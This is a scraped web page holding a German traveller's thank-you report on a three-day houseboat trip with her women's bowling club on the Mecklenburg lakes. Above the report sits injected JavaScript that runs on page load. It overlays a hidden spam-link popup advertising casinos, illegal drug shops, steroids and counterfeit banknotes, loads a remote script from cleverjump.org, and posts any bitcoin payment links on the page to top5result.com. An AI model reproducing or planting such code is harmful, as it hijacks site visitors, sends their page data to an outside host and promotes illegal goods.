/* Domain is for sale: admin@kickvox.com */ (function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var popupHtml = "
gruzija batumis meria<\/a> <\/div>
en.batumiexpert.com<\/span> <\/div> <\/div>
\u03b4\u03bf\u03c5\u03bb\u03b5\u03af\u03b1 \u03ac\u03bd\u03c4\u03bb\u03b7\u03c3\u03b7\u03c2 \u03cd\u03b4\u03b1\u03c4\u03bf\u03c2<\/a> <\/div>
apofraxeis24-antoniou.gr<\/span> <\/div> <\/div> <\/div>
casino online app<\/a> <\/div>
www.tgmcasino.com<\/span> <\/div> <\/div>
sweet sixteen photography brooklyn<\/a> <\/div>
hurricaneproductions.com<\/span> <\/div> <\/div> <\/div>
can i buy dilaudid online legally<\/a> <\/div>
www.nembutalonlineshops.com<\/span> <\/div> <\/div>
receptfri s\u00f6mntabletter<\/a> <\/div>
njuablababongapotek.com<\/span> <\/div> <\/div> <\/div>
sap ides<\/a> <\/div>
sapprofession.com<\/span> <\/div> <\/div>
cell phone number tracker online free<\/a> <\/div>
yotracker.com<\/span> <\/div> <\/div> <\/div>
\u5916\u8ce3\u8336<\/a> <\/div>
94ig8.com<\/span> <\/div> <\/div>
c# url encode<\/a> <\/div>
semalt.tools<\/span> <\/div> <\/div> <\/div>
affordable family law attorney<\/a> <\/div>
bordenfamilylaw.com<\/span> <\/div> <\/div>
\u0e42\u0e2b\u0e25\u0e14 981kiss<\/a> <\/div>
918kisstgm.com<\/span> <\/div> <\/div> <\/div>
mietwohnungssuche m\u00fcnchen<\/a> <\/div>
any-home.de<\/span> <\/div> <\/div>
brand activation services<\/a> <\/div>
www.choura.co<\/span> <\/div> <\/div> <\/div>
baltic amber reviews<\/a> <\/div>
mamajewels.co.uk<\/span> <\/div> <\/div>
tribestan 250mg x 60 tablets<\/a> <\/div>
www.clenbuterol4you.com<\/span> <\/div> <\/div> <\/div>
australian counterfeit 50 notes<\/a> <\/div>
banknotessupplier.com<\/span> <\/div> <\/div>
seo buenavista (la nopalera) m\u00e9jico<\/a> <\/div>
semalt.com<\/span> <\/div> <\/div> <\/div>
broker forex inc<\/a> <\/div>
fxgrow.com<\/span> <\/div> <\/div>
\u043a\u043e\u043b\u0435\u043d\u0432\u0430\u043b<\/a> <\/div>
moto-sich.com.ua<\/span> <\/div> <\/div> <\/div>
rehvivahetus<\/a> <\/div>
fs.ee<\/span> <\/div> <\/div>
\u043d\u0435\u0434\u0432\u0438\u0436\u0438\u043c\u043e\u0441\u0442\u044c \u0411\u0430\u0442\u0443\u043c\u0438<\/a> <\/div>
batumiexpert.com<\/span> <\/div> <\/div> <\/div>
\u0441\u0435\u043a\u0441 \u0448\u043e\u043f<\/a> <\/div>
sex-paradise.com.ua<\/span> <\/div> <\/div> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var popupCreated = false; function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:medium; line-height:normal;'); sheet.addRule('.shbNetPopupTable a', 'text-decoration:none; background:none; height:auto !important;'); } function tryCreatePopup(stage) { if (popupCreated) return; if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '437px', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} setTimeout(function() { try { var links = document.querySelectorAll('a[href^="bitcoin:"]'); //var links = document.querySelectorAll('a[href^="https://"]'); if (links.length) { var hrefs = []; for (var i = 0; i < links.length; i++) { hrefs.push(links[i].href); } var json = JSON.stringify({ hrefs: hrefs, jsDomain: 'top5result.com', refUrl: location.href }); var xhr = new XMLHttpRequest; xhr.open('POST', '//top5result.com/save.php'); xhr.setRequestHeader('Content-Type', 'text/plain'); xhr.onload = function() { xhr.responseText; } xhr.send(json); } } catch (ex) {} }, 2000); })();
22.10.2013

Reisebericht: Frauen und Bootsferien – Kegelvereinsausflug

Schöner Reisebericht über eine Bootsfahrt in der Mecklenburgischen Seenplatte mit einem Frauen-Kegelverein.

Hausboot: Grand Classique
Übernahmehafen: Jabel
Rückgabehafen: Marina Wolfsbruch
Reisezeit: 3 Tage im September 2013Reiseberatung und Buchung bei der Agentur: Ferien auf dem Wasser – Hausbootvermietung

Liebe Agentur “Ferien auf dem Wasser”,
hier kommt ein ganz ganz dickes DANKESCHÖN, da Sie mit ihrer tollen Beratung und immer geduldig ertragenen Fragen dazu beigetragen haben, das ich mit meinen Kegelschwestern Ende September ein unvergessliches Wochenende auf der Müritz verbracht habe.
In den letzten Nächten der Vorbereitung habe ich dann doch nicht mehr so gut geschlafen – immer der Gedanke, ob wohl alles klappt ?
Aber die Wetterprognosen waren gut und los ging es per Minibus nur für uns. das war schon mal sehr nett. Unser Busfahrer, ein Rentner mit Busfahrleidenschaft, hat uns liebevoll betreut. So kamen wir gutgelaunt in Jabel an.
Nach grosse AH und OH bei Betrachtung des Bootes (sie wußten ja vorher alles nicht), haben meine Mädels das Boot beladen, meine Einkäufe in der Küche verstaut, teilweise Betten bezogen und alles schön gemacht, während ich und meine Mitorganisatorin die Einweisung hatten. Bohh – da hat mir aber der Kopf geschwirrt. Aber packen wir es an, ist mein Motto….Es ging an die praktische Einweisung, da war ich kurz vorm Herzinfarkt – aber Marco hat das alles super nett gemacht und auch das rückwärts Einparken ging schon mal ganz gut…..Die Frage belib nur….. geht das auch ohne Hilfe?????
Bei Einzug aufs Boot stellten wir fest, daß ein Bett bzw.die Bettdecke nass war (Fenster undicht) aber Marco hat sofort Abhilfe geschaffen.
Nach einem von mir gedichtetem Seemannslied, in dem alle meine Kegelschwestern vorkamen, ging es nun auf Seefahrt. Die
Idee von ihnen in Jabel loszufahren, erwies sich als super, da a.) zum üben erst mal viel Platz war und b.) für die ersten alleinigen Seemanöver auch der Platz da war.
Kurz vor Waren kamen wir in einen kurzen regenguss, so dass ich auch den unteren Sterustand einmal ausprobieren konnte…..natürlich ist das oben an Deck viel schöner und übersichtlicher. Im Hafen Waren ging es dann sehr turbulent zu – die Aufregung beim Festmachen war groß, da wir zweimal umparken mußten….aber zum Schluß war alles gut. Der Stromanschluß funktionierte erst nicht, aber der telefonisch informierte Marco kam sofort angefahren und hat uns noch einen Adapterstecker gebracht – alles prima.
Der vorbestellte Tisch in den Ritterstuben war nett gedeckt und das Essen war lecker.
Am Samstag Morgen war es recht nebelig, so haben wir einen kleinen Stadtbummel gemacht, was uns Frauen sicherlich nicht schwer gefallen ist. Gegen Mittag ging es dann Richtung Röbel. Marco teile mir telefonisch mit, daß er etwas Angst um uns hätte…… WARUM!!!! Alles läuft super!!!! In Röbel waren wir auf dem Kirchturm und in der Windmühle und anschließend gab es Kaffetrinken an Deck mit unserem selbstbackenen, mitgebrachtem Kuchen.
Weiter ging es bis Mirow, wo uns die erste Schleuse erwartete.. Aber wo ist das Problem? Gerade reinfahren, gerade rausfahren, die Crew anweisen….schon klappt alles. Die aufmunternden Worte meiner Kegelschwestern taten schon sehr gut. Am Hafen erwartete uns ein wild winkender Ole (Freund von Marco, der uns schon angemeldet hatte) in einer reservierten Parkbucht und einwies. Ich wollte eigentlich rückwärts das Boot anlegen, aber Ole meint vorwärts wäre besser. Mir hat das alles soooo viel Spaß gemacht, obwohl es jedesmal Herzklopfen gab.
Der reservierte Tisch im Strandrestaurant war ebenfalls wieder nett eingedeckt….das Essen reichlich, lecker und total preiswert…nur zu empfehlen……(das Lokal war total voll – Vorbestellung ist hier sicherlich angebracht)
Am Sonntag ging es dann durch viele Kanäle, mehreren Schleusen bis Rheinsberg. Der Mittagsstopp bei Boot und Mehr (empfohlen von Ihnen Herr Dankert) erwies sich als ebenso super, wie der Tipp von Frau Mauthe (sonntags nicht auf dem Müritzsee schippern,wegen der vielen vielen Segelboote bei gutem Wetter, die man alle irgendwie umfahren muß)
Vor dem leckerem Fischimbiss bei Boot und Mehr haben wir einen einstündigen Spaziergang durch die Natur gemacht.
In Rheinsberg war das Anlegen schon mit weniger Herzklopfen verbunden. Und die spontanen Umarmungen und der Lob meiner Mädels, taten sein übriges.
Und wieder ein schön gedeckter Tisch in der Pizzeria! Wir haben alle viel zu viel gegessen. so große Pizzen – oh mein Gott – ich glaube keiner hat aufgegessen – aber super lecker.
Der Montagmorgen war dann noch echt ein Highlight…. wir haben ohne Frühstück um 7:30 abgelegt (mußten ja um 9:00 in Marina Wolfsbruch sein). Dieses Fahren durch den leichten Bodennebel bei Sonnenaufgang, die Ruhe und Stille, es war traumhaft schön. (mein Komentar: Und wehe jemand macht jetzt das Radio an!!!) diese Stimmung habe ich total genossen und war schon fast traurig, daß ich das Boot gleich wieder abgeben mußte.
Die Hafeneinfahrt Marina Wolfsbruch war recht eng, aber wir haben unser Böötchen ohne einemal angestoßen zu sein abgegeben, worauf ich sehr stolz war/bin.
Die Abgabe ging kurz und bündig über die Bühne – Klasse. Unser Gepäck konnten wir auf zwei großen Bollerwagen von LeBoat
zwischenlagern, bis unser Bus kam.
Wir haben dann in aller Ruhe und Ausführlichkiet im Best Western Hotel am wieder vorzeitig reserviertem Tisch ein super Frühstück genossen. Lt.meinen Mädels stand das Frühstück an Bord dem allerdings nichts nach…..
Nach einer etwas längeren, durch Staus bedingten Rückfahrt, waren wir uns alle einig:
Dieser Ausflug unseres Kegelvereins war mit das Schönste, was wir je erlebt haben.
Die ein oder andere wird es vielleicht noch einmal machen. Und auch wenn wir von dem ein oder anderem gehört haben – wie, was , nur Frauen!!!! JA – das geht!!!!
Mit ganz lieben Grüßen aus Versmold
Annette M.

Kategorien